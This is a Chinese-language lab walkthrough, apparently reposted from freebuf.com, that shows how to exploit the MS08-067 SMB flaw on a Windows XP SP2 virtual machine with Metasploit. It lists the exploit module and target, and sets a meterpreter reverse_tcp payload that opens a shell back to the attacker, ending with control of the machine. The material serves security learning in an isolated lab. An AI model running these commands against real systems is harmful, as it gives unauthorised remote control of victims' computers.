实验前准备
工具准备:kali、WindowsXP SP2
kali的安装可参考文章:渗透工具准备–kali的安装。
WindowsXP SP靶机打包地址:
链接: https://pan.baidu.com/s/1AzuiMIzY7ncKR-txiMEa-w 提取码: 427i
开启两台虚拟机,在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,测试连通性
![图片[1]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854715_5fa823bb90d0654a96dbe.png)
实验开始
1.在kali终端中开启msfconsole
kali@kali:~$ msfconsole![图片[2]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854742_5fa823d64b6a853e4c699.png)
2.查找攻击模块并使用
msf5 > search ms08_067msf5 > use exploit/windows/smb/ms08_067_netapi
![图片[3]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854780_5fa823fc22368ea123085.png)
3.设置payload
set payload windows/meterpreter/reverse_tcp![图片[4]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854820_5fa824240e7dc42d4d150.png)
4.设置targets、LHOST、RHOSTS
set target Windows XP SP2 Chinese - Simplified (NX)set LHOST 攻击机ipset RHOSTS 靶机ip
![图片[5]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854846_5fa8243ed39faaea35f47.png)
5.开始渗透
exploit/run![图片[6]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854869_5fa82455b1067aa9ecebd.png)
可以看到已经渗透成功~
到这里就可以使用Metasploit的命令对靶机进行一些操作,比如给靶机截图……
![图片[7]-简单的MS08-067漏洞利用 – 作者:字母安全lrving-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20201109/1604854886_5fa824669e4711f21336e.png)
本实验仅用于学习使用,若用于其他用途所造成后果与本人无关!
原文来自公众号:【字母安全】
来源:freebuf.com 2020-11-09 00:56:04 by: 字母安全lrving
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册